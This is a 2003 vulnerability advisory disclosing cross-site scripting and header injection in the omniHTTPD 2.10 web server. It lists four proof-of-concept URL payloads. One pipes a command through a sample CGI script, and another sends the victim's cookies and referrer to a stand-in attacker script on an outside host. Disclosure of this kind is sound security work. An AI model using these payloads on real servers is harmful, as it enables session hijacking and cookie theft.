omniHTTPD 2.10 cross-site scripting

Release Date:
17.07.2003

Severity:
Medium (Session hijacking/possible compromise)


Platforms Affected: 

omniHTTPD 2.10
Windows 2000 Any version
Windows NT Any version
Windows XP
Windows 9x
Windows Me


Description:

OmniHTTPd is a powerful all-purpose industry compliant web server built specifically for the Windows 95/98/NT4 platform. In addition to Standard CGI support, the server sports advanced features such as Keep-Alive connections, table auto-indexing and server-side includes. For maximum performance, OmniHTTPd is both 32-bit and multi-threaded. Many users agree that OmniHTTPd is the fastest and most compact web server available for the Windows platform. 

A remote attacker could embed malicious script within a URL to one of the  services, which would be executed in the victim's Web browser once the URL is clicked


Technical Description/Exploit:

This vulnerability could enable an attacker to hijack web sessions, allowing a range of potential compromises on the targeted host.
The Location header sent by the server contains the URL initially requested, but with %xx decoded to ASCII values. Embedding %0D, %0A, and %20 codes into the URL is allowed, meaning HTTP headers can be added.The vulnerability occurs because omniHTTPD doesn't filter maliciously malformed headers containing HTML markup before passing them onto the browser as entity data.

The following URLs will demonstrate the attack:

(1)

<script>window.location="/cgi-bin/minimal.pl?|<dir>%00";</script>

In our example we will play with the above command using the file:
/cgi-win/test-win.exe

The url will be something like this:
/cgi-win/test-win.exe?<script>window.location="/cgi-bin/minimal.pl?|<dir>%00";</script>
This will call the file minimal.pl in cgi-bin....

(2)
http://[target]/cgi-bin/minimal.pl?<img src="http://www.hack.gr/images/gears.jpg" onerror="alert(document.cookie)">

(3)
<script> window.open('http://host/cgi-bin/evilSCRIPT.pl?'+document.referrer +'%20'+document.cookie);</script>

(4)
http://[target]/cgi-win/test-win.exe?<script>alert("p0wned!")</script>

Cross-site scripting vulnerabilities are often assumed to be small, useless exposures that aren't worth much attention. This is a false assumption -- depending on the applications installed, a successful privilege escalation via XSS can result in complete compromise of a web server, or other sensitive systems.


Vendor Status: 
Vendor informed but I got no response yet

Patch:
At the moment remove all the sample file.

Credit: 
dr_insane

Disclaimer: 
The author(s) does(do) not have any responsibility for any malicious
use of this advisory or proof of concept code. The code and the
information provided here are for educational purposes only.
The author(s) will NOT be held responsible for any direct or 
indirect damages caused by the information or the code
provided here.


dr_insane
dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/